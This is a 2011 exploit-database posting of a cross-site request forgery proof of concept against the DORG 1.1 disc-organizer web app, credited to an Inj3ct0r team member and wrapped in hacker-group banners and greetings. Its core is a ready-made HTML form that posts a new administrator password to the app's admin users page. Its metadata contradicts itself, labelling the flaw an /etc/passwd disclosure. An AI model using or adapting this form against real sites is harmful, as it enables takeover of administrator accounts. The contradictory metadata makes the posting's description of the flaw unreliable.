DORG 1.1 Cross Site Request Forgery

2011-05-07 / 2011-05-08
Credit: knockout
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

DORG 1.1 <= CSR-Forqery PoC Exploit 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [~] Live Contact : knockoutr@msn.com [~] E-Mail : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com - http://09EXPLOIT.COM / HTTP://0NTO.ME -------------------------------------------------------- &#222;u metriisiiin n... bir uzunnnnnn alannn... http://www.youtube.com/watch?v=2OeCifsOusw -------------------------------------------------------- ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : HOMEPIMA Design |~Price : N/A |~Version : N/A |~Software: http://php.opensourcecms.com/scripts/details.php?scriptid=479&name=Disc%20ORGanizer%20-%20DORG |~Vulnerability Style : /etc/passwd Disclosure |~Vulnerability Dir : / |~Google Keyword : N/A |[~]Date : "06.05.2011" |[~]Tested on : Offical Demo ; http://demo.opensourcecms.com/dorg/ ---------------------------------------------------------- users.php <= SESSIONS Not Security Admin Password Change CSRF POc . ================================================================ <form action='http://demo.opensourcecms.com/dorg/admin_panel/users.php?page=2&id=1' method="POST"> <table> <tr> <td>Username: </td> <td><strong>admin</strong></td> </tr> <tr><td colspan='2'><!----></td></tr> <tr> <td>Active?</td> <td><strong>yes</strong></td> </tr> <tr><td colspan='2'><br /></td></tr> <tr> <td><label for="new_pw">New password:</label></td> <td><input type="password" name="new_pw" id="new_pw" /></td> </tr> <tr> <td><label for="new_pw_c">New password (confirmation):</label></td> <td><input type="password" name="new_pw_c" id="new_pw_c" /></td> </tr> <tr><td colspan='2'><i>Your password will be encrypted</i></td></tr> <tr><td colspan='2'><br /></td></tr> <tr><td colspan='2'><input type='submit' name='submit' value='Update' />&nbsp;-&nbsp;or&nbsp;-&nbsp;<input type='submit' name='submit' value='Deactivate User' /></td></tr> </table> </form> OHH OKAY... ================================================================ .__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ Was Here. HTTP://H4X0RESEC.BLOGSOT.COM # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... # 1337day.com [2011-05-01]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top